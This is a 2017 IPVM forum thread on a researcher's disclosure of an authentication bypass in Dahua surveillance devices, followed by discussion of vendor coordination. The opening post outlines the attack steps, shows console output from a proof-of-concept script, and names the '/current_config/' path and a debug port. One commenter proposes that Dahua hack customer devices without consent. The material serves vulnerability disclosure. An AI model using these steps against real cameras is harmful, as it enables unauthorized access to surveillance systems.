Subscriber Discussion

0-Day: Dahua Backdoor Generation 2 & 3

UE
Undisclosed End User #1
Mar 05, 2017

[IPVM Update: Researcher had shared code but has removed it temporarily and is communication with Dahua. More details inside discussion.]

[IPVM Update: full report and testing findings released of the Dahua backdoor here.]

[STX]

I'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have just found.

I have just discovered (to what I strongly believe is backdoor) in Dahua DVR/NVR/IPC and possible all their clones.

Since I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the community.
(I simply don't want to listen on their poor excuses, their tryings to keep me silent for informing the community)

In short:
You can delete/add/change name on the admin users, you change password on the admin users - this backdoor simply don't care about that!
It uses whatever names and passwords you configuring - by simply downloading the full user database and use your own credentials!

This is so simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as source to remotely login to the Dahua devices

This is like a damn Hollywood hack, click on one button and you are in...


Below PoC you will find here: [REMOVED]
Please have understanding of the quick hack of the PoC, I'm sure it could be done better.

Have a nice day
/bashis

$ ./dahua-backdoor.py --rhost 192.168.5.2

[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]

[i] Remote target IP: 192.168.5.2
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 2 found
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
[>] Requesting our session ID
[<] 200 OK
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }

[>] Logging out
[<] 200 OK

[*] All done...
$

$ ./dahua-backdoor.py --rhost 192.168.5.3

[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]

[i] Remote target IP: 192.168.5.3
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 3 Found
[i] Choosing Admin Login: admin, Auth: 27
[>] Requesting our session ID
[<] 200 OK
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
[i] Random value to encrypt with: 1958557123
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }

[>] Logging out
[<] 200 OK

[*] All done...
$

[ETX]

 

U
Undisclosed #2
Mar 05, 2017
IPVMU Certified

If you enjoyed 'Dahua Backdoor' by bashis, check out some of his other Greatests Hits...

[IPVM Note: bashis also discovered the Axis critical security vulnerability last year]

(1)
UI
Undisclosed Integrator #3
Mar 05, 2017

So this is legit?  Is it really a backdoor/intentional or just a security vulnerability?

U
Undisclosed #2
Mar 05, 2017
IPVMU Certified

IMHO, all backdoors are intentional.

Some though are just laziness, for testing and debugging and service issues.

Others could be used as a way to control the device against the wishes of the owner.

bashis, what was the intent here, do you think?

(1)
UE
Undisclosed End User #1
Mar 05, 2017

I can only speculate into why and for what purpose, which i prefer not to.

In DVR/NVR they use one (threaded) application for everything, named "Challenge", which is statically linked by the way.

In IPC/VTO they also use one (threaded) application, named "Sonia", dynamically linked.

To "Challenge" there is a another application named "dvrhelper", and for "Sonia", there is "systools", that will open up a debug/control port on TCP/6789 with direct access into Challenge/Sonia (l/p protected of course) where almost everything can be done, including providing remote shell.

 The name "Challenge" and statically linked binary caught my interest for deeper investigation.

They seems to share same codebase (binary wise you will find several 100% identical functions), so I could expect there is another Dahua HW carrying same thing.

Anyhow, by using the tag "/current_config/", you have access to everything located within "/mnt/mtd/Config", but in the code they only refer to: "/current_config/preLanguage" and "/current_config/WebCapConfig".

 

(1)
AT
Andrew Tierney
Mar 07, 2017

Sounds very similar to a lot of other DVRs, though the binary is called Sofia on XM and Yale DVRs.

Avatar
Brian Karas
Mar 05, 2017
IPVM

$ ./dahua-backdoor.py --rhost 192.168.5.2

This looks like it was targeting devices on the same subnet. Does it work the same from a remote IP?

Also what is Generation 2 and 3 referring to? A rev of hardware?

UE
Undisclosed End User #1
Mar 05, 2017

Remote IP works. (It's normal HTTP/HTTPS request)

Generation 2 and 3 is the version of user database/hash.

Gen 1: Base64

Gen 2: Dahua 48bit algorithm

Gen 3: MD5

 

U
Undisclosed #4
Mar 05, 2017

Perhaps we should start a thread about who OEMs Dahua...

JH
John Honovich
Mar 05, 2017
IPVM

#4, before we go there, we need to be sure what versions / generations this impacts. For example, is it currently shipping product? If not, how old? What firmware versions? etc.

(2)
UE
Undisclosed End User #1
Mar 05, 2017

Current and past.

(3)
JH
John Honovich
Mar 05, 2017
IPVM

Current and past.

Ok, that's very serious then.

Dahua has responded to us and is investigating this. Before we do anything in terms of publicizing this, we want to make sure either (1) we can replicate it ourselves with current Dahua firmware / models (which we plan to do today / tomorrow) and if possible (2) Dahua can provide a statement / response / plan.

Can Dahua contact you at mcw@noemail.eu? Are you willing to speak with them?

U
Undisclosed #2
Mar 05, 2017
IPVMU Certified

Perhaps we should start a thread about who OEMs Dahua...

We could call it Who OEMs Dahua?

;)

(2)
JH
John Honovich
Mar 05, 2017
IPVM

UPDATE: Dahua is in communication with Bashis. Bashis has removed the code temproarily, noting:

I have received request from Dahua for temporally remove this code.

Code will be removed until 5 April, to give them 30 days to address the problem.

Sorry, bashis

Related, this indicates that Dahua is acknowledging that this is legitimate. We are in communication with Dahua to understand what specific models are impacted and when the fix is released.

(1)
U
Undisclosed #2
Mar 05, 2017
IPVMU Certified

Dahua in the meantime is in a race against the bots for control of possibly every publicly facing Dahua device.   Not just default cred ones.

While Dahua still can, they need to write something to enter their own backdoor and disable it permanently.

They need to run it on every and any Dahua device they can find publicly.  Otherwise, once these devices are subverted by another organization, they may forever be used against the rest of the Internet.

Yes, this is questionably legally, but practically it is in the best interests of the Dahua owners themselves and the Internet at large.

Whatever legal fallout occurs would be Dahua just desserts for the unforced error in the first place. 

(1)
(1)
JH
John Honovich
Mar 05, 2017
IPVM

Yes, this is questionably legally, but practically it is in the best interests of the Dahua owners themselves and the Internet at large.

Remember: Should I Hack 10,000 Dahua Cameras? ;) You may want to update that to Should Dahua Hack 10 million Dahua devices?

And what about the OEMs? How many of their devices are vulnerable? 

And the product that is shipped and in inventory around the globe? The boxes on ADI shelves, etc.

There's a lot of coordination that needs to be done.

 

(2)
U
Undisclosed #5
Mar 05, 2017

JH,

Are we going to have a little break from HIK talk?
Can we talk about Dahua for next 3 month please :)
Thank you

(1)
(3)
(2)
JH
John Honovich
Mar 05, 2017
IPVM

#5, sigh...

IPVM is your enemy when it criticizes your line. IPVM is your friend when it criticizes your competitor. 

This certainly is going to be the lead story on IPVM this week and the ramifications may take a while to play out and cover.

(3)
AT
Andrew Tierney
Mar 07, 2017

Unless the web interface allows escalation to access of the system itself, the risk is solely to the video functionality. This doesn't allow the devices to be recruited into a botnet.

JH
Jay Hobdy
Mar 05, 2017
IPVMU Certified

So are we basically saying if the device is exposed to the internet, one could  just upload their own log in?

I suppose if the device is behind a firewall or vpn this would not be possible?

UE
Undisclosed End User #1
Mar 05, 2017

We could do, but it's easier to first download your's credentials and use them.

Well, UPnP disabled?

(1)
JH
John Honovich
Mar 06, 2017
IPVM

Two updates:

Karas verified the script worked on a current Dahua IP camera.

I have notified as many Dahua OEMs as I personally know.

We expect more information Monday.

(1)
(2)
RS
Robert Shih
Mar 06, 2017
Independent

I'll be checking it out. Not sure if I have the script downloaded though.

JH
John Honovich
Mar 06, 2017
IPVM

Update: we plan to publish our full report and test findings at 4pm today (03/06/17).

Update #2: see Dahua Backdoor Uncovered for full report

 

New discussion

Ask questions and get answers to your physical security questions from IPVM team members and fellow subscribers.

Newest discussions